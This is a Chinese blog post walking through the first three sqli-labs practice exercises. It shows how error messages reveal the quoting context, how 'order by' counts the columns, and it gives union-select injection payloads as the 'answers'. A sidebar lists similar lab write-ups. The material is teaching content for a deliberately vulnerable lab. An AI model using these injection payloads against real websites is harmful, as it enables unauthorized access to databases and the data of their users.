SQLI第一二三题

最新推荐文章于 2024-04-16 22:46:11 发布
最新推荐文章于 2024-04-16 22:46:11 发布
阅读量494 收藏 2
点赞数
分类专栏: SQLi 文章标签: SQLi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41581915/article/details/102570242
版权

SQLi题目

文章目录

第一题:

先尝试-1、‘、“等字符,产生报错信息,通过报错信息来判断接下来如何操作

在这里插入图片描述

报错信息用两个单引号标注,我们这里复制出两个单引号之间的内容,就是下面的字符串

报错信息-----> ’ 1’ ’ LIMIT 0,1

根据报错信息,可以确定输入参数的内容被存放到一对单引号中间,

猜想:咱们输入的1在数据库中出现的位置为:select … from … where id=’1’ …,

也可以查看sqli-lab中less-1的php文件可以看到,和猜想一致。

在这里插入图片描述

这里直接尝试联合查询,爆出注入点(%23为#的url编码,注释后面内容,–+也是注释, --空格)

首先我们查询列数

当我们输入1‘order by 5 %23

在服务端执行的语句

SELECT * FROM users WHERE id=’ 1 ’ order by 5 %23 ’ LIMIT 0,1

等同于

SELECT * FROM users WHERE id=’ 1 ’ order by 5

依次查询出字段数为3

开始注入

答案------> ?id=-1’ union select 1,2,3%23

第二题:

同样的我们尝试 单引号、双引号报错

在这里插入图片描述

报错信息---------> ’ LIMIT 0,1

根据报错信息,可以确定输入参数的内容被直接存放查询语句

查看源代码也可以验证猜想

所以我们直接联合查询,这里步骤与第一题类似,不再复述

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KBrqSJ34-1571129487148)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\1571125969667.png)]

答案------> ?id=-1 union select 1,2,3%23

第三题:

同样的我们尝试 单引号、双引号报错

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-STUDNCdR-1571129487150)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\1571127126495.png)]

报错信息---------> ‘1’’) LIMIT 0,1

根据报错信息,可以确定输入参数的内容被存放到一对括号中间

查看源代码也可以验证猜想

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VHB7yWFq-1571129487152)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\1571127227671.png)]

首先我们查询列数

当我们输入1‘)order by 5 %23

在服务端执行的语句

SELECT * FROM users WHERE id=’ 1 ’ order by 5 %23 ’ LIMIT 0,1

等同于

SELECT * FROM users WHERE id=’ 1 ’ order by 5

依次查询出字段数为3

开始注入

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ljSSABaX-1571129487153)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\1571127298038.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-f8G0gtDZ-1571129487153)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\1571127315098.png)]

答案------> ?id=-1’) union select 1,2,3 %23

熊猫在路上
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi-Labs刷记录】 第二关、三、四关思路
gavinmao97的博客
07-31 522
/* 作者刚刚接触sql注入,本文仅用作记录刷sqli-labs靶场时的思路,仅代表个人的看法,如有不当之处,欢迎各位大佬及时批评指正! */ sqli-labs 前四关的注入思路是基本相同的,这一点从关卡名称上也可以大致看出,都是基于报错(Error Based)的注入,因此本文只简单阐述第二、三、四关的注入点探测思路,具体的注入过程可以参考上一篇文章【SQLi-Labs刷记录】 Less1第一关思路。 目录sqli-labs Less-2sqli-labs Less-3sqli-labs Less-
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1307
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli第一
qq_52178594的博客
09-11 1466
这个问问的好,在url解释执行的时候,url中#号是用来指导浏览器动作的,对服务器端无用,所以我们要将#写成%23来完成注入。哈哈哈哈,这个问问的有点刁钻,果然阁下是人中龙凤,马中赤兔,不鸣则已,一鸣惊人。额,一看你就没学过MySQL,小伙子我这就帮不了你啦,在工作或者学习中,总有很多东西是我们不了解甚至闻所未闻的,这很正常。因为使用-- (后接一个单纯的空格),在传输过程中空格会被忽略,会导致无法注释,所以在get请求传参注入时才会使用--+的方式来闭合,因为+在SQL语句中会被解释成空格。
Sqli-labs-第三
qq_40591440的博客
11-18 210
首先需要猜测 其中的闭合 输入‘“)使数据库回显报错信息 /Less-3/?id=1'") #报错回显如下 '")') LIMIT 0,1' ")') LIMIT 0,1 首先去掉最外边的 单引号 #可以看到 ”) 是我们填入的 而之后又会有 ’) 可以猜测是‘)闭合 /Less-3/?id=1')--+ 使用--+来注释后面的语句 猜测字段数量 #使用排序的方法对字段数猜测 Less-3/?id=1') order by 3--+ 对回显的信息查询 # 使用联合查询语句 对 查询的数据进
GET报错注入(Sqli-labs第一详解)
Hardworking666的博客
01-06 1998
文章目录一、找注入点二、order by判断列数三、union联合注入,判断数据显示点四、爆库、爆表 一、找注入点 单引号注入目,在参数后面加一个单引号: /?id=1' 数据库报错,单引号匹配出错,即添加的单引号成功被数据库解析,可以通过闭合id参数,插入构造的sql语句实施攻击。 二、order by判断列数 order by 1、2、3都尝试,无报错。 /?id=1' order by 4 --+ 用4的话报错:Unknown column ‘4’ in ‘order clause’ 证明..
sqli-lab_基础篇_1-23做反思
weixin_44110913的博客
05-09 213
################################################### sqli-lab 1-23做反思 get 类 1-4:联合查询: 特点:输入特殊符号有报错提示,并且可以联合查询 1.用符号闭合掉或者注释符号即可/!!!猜测出数据类型!!!/ 如 or 1=1 ’ or 1=1# 和 'or ‘1’=‘1 ’ or 1=1# 和 ‘)or (‘1’)=(‘1 " or 1=1# 和 ") or (“1”)=("1 %’ or
SQLi-Labs刷记录】第八关思路 布尔盲注
gavinmao97的博客
12-16 1074
/* 作者刚刚接触sql注入,本文仅用作记录刷sqli-labs靶场时的思路,仅代表个人看法,如有不当之处,欢迎各位大佬及时批评指正! */ 根据关卡名称可知,sqli-labs第八关的考点是布尔盲注。 SQLi-Labs Less-8 第一步,根据关卡名称提示可知,本的注入点需要构造一个闭合的单引号对 构建url: …/Less-8/?id=8’ 页面无显示 构建url: …/Less-8/?id=8’ --+ 页面显示正常 根据页面回显可知,本关的反馈结果只有“You are in”或者没有反馈,而
SQL注入sqli第四关(less-4)
s_xcx_ah的博客
06-10 1368
SQLI第四关
【1day】sqli-labs靶场,第一关基础个人详解
zadaSS的博客
10-19 2055
新手入门的自我记录
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1713
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs--23-37关通关指南(详细)
weixin_44576725的博客
11-14 1627
文章目录Less-23Less-24Less-25Less-25aLess-26Less-26aLess-27Less-27aLess-28Less-28aLess-29背景知识:正:Less-30Less-31Less-32Less-33Less-34Less-35Less-36Less-37总结Less-37总结 前言:本节开始对advanced injections关卡进行通关记录,23-38关 在这里补充一下信息收集的命令: @@version 数据库版本 @@datadir 数据库数据路径 @
sql注入---入门到进阶
热门推荐
春日野穹
10-24 3万+
目录导航 sql注入的原理 sql注入的条件 sql注入的危害 sql注入的分类、验证及利用方式 sql数值型注入 sql注入的原理: 概述:针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为,其本质就是对于输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行,sql注入产生的原理有以下几个方面 程序编...
mysql select from user_select * from user 这条 SQL 语句,背后藏着哪些不可告人的秘密?...
weixin_39995764的博客
01-21 1017
作为一名 Java开发人员,写 SQL 语句是常有的事,但是你知道 SQL 语句背后的处理逻辑吗?比如下面这条 SQL 语句:select * from user where id=1执行完这条语句后,我们就会得到 id 为 1 的用户信息。那么对于这一条 SQL 语句,MySQL服务器做了哪些处理呢?这篇文章我们就一起打卡 MySQL 数据库中对 SQL 语句的处理逻辑。了解 MySQL 数据库...
sqlilabs靶场1—20学习笔记(思路+解析+方法)
最新发布
2301_79355407的博客
04-16 2025
此文章为初学者在学习SQL注入使用sqlilabs靶场的学习笔记,均为手工注入,未使用sqlmap。有很多出错以及不懂的地方。此文章会不断补充和更正。
SQLi-Labs通关笔记
Lethe's Blog
07-26 1973
Less-1 ?id=1' 单引号报错,存在注入 ?id=1' order by 4 %23'报错,存在三列 ?id=-1' union select 1,2,3%23 发现2和3的位置可以回显,于是进行注入 ?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where ta...
sql注入详解
m0_67392811的博客
06-12 5971
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
简单的三道Sqli习
young9222的博客
04-03 448
简单的三道Sqli习 2019年3月14日14:35:27 Q1. Login as admin 0 Q2. Login as admin 1 Q3. 学生成绩查询 一、Login as admin 0 URL:https://hackme.inndy.tw/login0/ 本只有一个登陆页面,并且可以查看源码,源码中把过滤方法和sql语句以及表的字段都告诉了我们: 过滤: functio...
sqli-labs靶场(23-38关)
weixin_51566481的博客
08-16 1184
sqli-labs,sql注入
sqli-labs练习(第二关)——数字型
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-17 1745
1、先判断是字符型还是数字型。 172.16.11.222/sqli-labs/Less-2/?id=1 id=2-1 与 id=1的结果一样,说明是数字型。 2、确认字段位数 172.16.11.222/sqli-labs/Less-2/?id=1 order by 3 一共3位 3、确认占位信息 172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,3 --+ 4、找库名 http://172.16.11.222/sqli-labs/Less-
sqli-labs第一
09-03
sqli-labs的第一是一个简单的SQL注入挑战,旨在让你熟悉基本的SQL注入技术。该目要求你通过输入特定的注入语句来绕过应用程序的身份验证系统,以获得管理员权限。 具体步骤如下: 1. 打开sqli-labs网站并导航...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值